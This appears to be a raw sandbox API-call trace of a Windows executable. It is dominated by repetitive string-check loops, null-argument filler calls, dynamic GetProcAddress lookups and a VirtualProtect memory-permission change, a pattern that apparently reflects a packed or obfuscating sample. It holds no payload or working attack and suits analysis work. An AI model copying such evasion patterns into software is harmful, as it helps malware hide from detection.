0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.067] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.067] IsCharAlphaW (ch=0x20) returned 0 [0013.068] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.068] IsCharAlphaW (ch=0x20) returned 0 [0013.068] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.068] IsCharAlphaW (ch=0x20) returned 0 [0013.068] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.068] IsCharAlphaW (ch=0x20) returned 0 [0013.068] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.068] IsCharAlphaW (ch=0x20) returned 0 [0013.068] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.068] IsCharAlphaW (ch=0x20) returned 0 [0013.068] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.068] IsCharAlphaW (ch=0x20) returned 0 [0013.068] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.068] IsCharAlphaW (ch=0x20) returned 0 [0013.199] lstrcmpiW (lpString1="NEST", lpString2="NEST") returned 0 [0013.199] GetTickCount () returned 0xc12c [0013.199] GetSystemDirectoryA (in: lpBuffer=0x21eea4, uSize=0x12c | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0013.199] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x0 | out: lpFileInformation=0x0) returned 0 [0013.199] GlobalAddAtomW (lpString="BASIC") returned 0xc148 [0013.199] SizeofResource (hModule=0x0, hResInfo=0x0) returned 0x0 [0013.199] GetUserDefaultLCID () returned 0x409 [0013.199] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0013.200] VirtualProtect (in: lpAddress=0x413000, dwSize=0x314, flNewProtect=0x4, lpflOldProtect=0x18fa34 | out: lpflOldProtect=0x18fa34*=0x80) returned 1 [0013.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77100000 [0013.200] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.200] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.200] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.200] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.200] IsCharLowerA (ch=65) returned 0 [0013.200] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.200] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.200] IsCharLowerA (ch=66) returned 0 [0013.200] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.200] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.200] IsCharLowerA (ch=67) returned 0 [0013.200] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.200] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.200] IsCharLowerA (ch=68) returned 0 [0013.200] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.200] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.200] IsCharLowerA (ch=69) returned 0 [0013.200] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.200] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.200] IsCharLowerA (ch=70) returned 0 [0013.200] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=71) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=72) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=73) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=74) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=75) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=76) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=77) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=78) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=79) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=80) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=81) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.201] IsCharLowerA (ch=82) returned 0 [0013.201] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.201] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=83) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=84) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=85) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=86) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=87) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=88) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=89) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=65) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=66) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=67) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=68) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=69) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.202] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.202] IsCharLowerA (ch=70) returned 0 [0013.202] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] IsCharLowerA (ch=71) returned 0 [0013.203] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.203] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.203] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.203] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.203] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.203] IsCharLowerA (ch=65) returned 0 [0013.203] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] IsCharLowerA (ch=66) returned 0 [0013.203] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] IsCharLowerA (ch=67) returned 0 [0013.203] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] IsCharLowerA (ch=68) returned 0 [0013.203] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] IsCharLowerA (ch=69) returned 0 [0013.203] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] IsCharLowerA (ch=70) returned 0 [0013.203] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] IsCharLowerA (ch=71) returned 0 [0013.203] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.203] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.203] IsCharLowerA (ch=72) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=73) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=74) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=75) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=76) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=77) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=78) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=79) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=80) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=81) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=82) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=83) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.204] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.204] IsCharLowerA (ch=84) returned 0 [0013.204] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=85) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=86) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=87) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=88) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=89) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=65) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=66) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=67) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=68) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=69) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=70) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] IsCharLowerA (ch=71) returned 0 [0013.205] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.205] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.205] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.205] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.206] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.206] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.206] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.206] IsCharLowerA (ch=65) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=66) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=67) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=68) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=69) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=70) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=71) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=72) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=73) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=74) returned 0 [0013.206] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.206] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.206] IsCharLowerA (ch=75) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=76) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=77) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=78) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=79) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=80) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=81) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=82) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=83) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=84) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=85) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=86) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.207] IsCharLowerA (ch=87) returned 0 [0013.207] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.207] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=88) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=89) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=65) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=66) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=67) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=68) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=69) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=70) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] IsCharLowerA (ch=71) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.208] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.208] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.208] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.208] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.208] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.208] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 